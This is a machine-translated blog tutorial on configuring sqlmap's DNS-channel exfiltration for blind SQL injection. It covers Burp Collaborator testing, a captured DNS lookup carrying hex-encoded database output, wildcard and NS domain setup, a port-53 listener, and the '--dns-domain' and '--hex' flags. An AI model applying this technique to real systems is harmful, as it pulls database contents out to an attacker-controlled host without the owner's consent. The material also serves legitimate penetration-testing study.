Shulou(Shulou.com)05/31 Report--

This article introduces you what is the sqlmap _ dns injection configuration method, the content is very detailed, interested friends can refer to, hope to be helpful to you.

There are too few articles about dns injection of sqlmap on the Internet, just a brief introduction to the dns-domain parameters, and the relevant actual combat articles are either written vaguely or written at a glance, causing haze in the clouds (mainly vegetables, the key is not brought by the boss). Then refer to the method on the Internet and do it all over again.

Need to prepare things, sqlmap, windows blind injection of one, two domain names, a foreign network server.

When I came across a time blind injection when I was in trouble, it happened to be a windows, and I thought of the method of dns injection.

Before I start, I'm going to test dns injection into payload with sqlmap's-- sql-shell command.

First go to collaborator client in burpsuite to copy the domain name assigned to us by burp.

Executing sql statements using sqlmap

While Sqlmap is still running, the request has been received in burpsuite.

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

The 352E362E3134 in is the result returned after executing version ().

The version of mysql is obtained by decoding. Well, there's nothing wrong with dns injection at this point.

Prepare to configure 2 domain names, some articles on the Internet say that one is fine, but always feel more troublesome, many domain name server providers do not provide some advanced features, so it is easier to prepare two.

Www.a.com

Www.b.com

First, let's configure the domain name a-> a.com

You only need to add * to pan-parse the ip that points to our public network server.

To configure our domain name b-> b.com

This is even easier. Just modify the dns of the domain name and fill in the ns1.a.com ns2.a.com. You don't have to do anything else, just fill in it.

Then wait for the domain name to take effect. Let's test it on the public network server to see if the parsing is successful.

Start listening to port 53 on the server

Then the native ping hello.b.com sends on the public network server that we have been able to accept the hello.b.com request, and the local prompt is that we can't find the host. Don't worry about it, because we haven't set up parsing. It's all configured. We can use sqlmap for dns injection.

Add the parameter-- dns-domain=b.com-- hex to Sqlmap

When you come to this step, sqlmap will jam the prompt to set up the DNS server instance

Direct ctrl+c

It is suggested that the data retrieval through the DNS channel is successful.

The speed of injection is as fast as error reporting and association, and you no longer have to put up with turtle speed.

So much for sharing what the sqlmap _ dns injection configuration method is. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.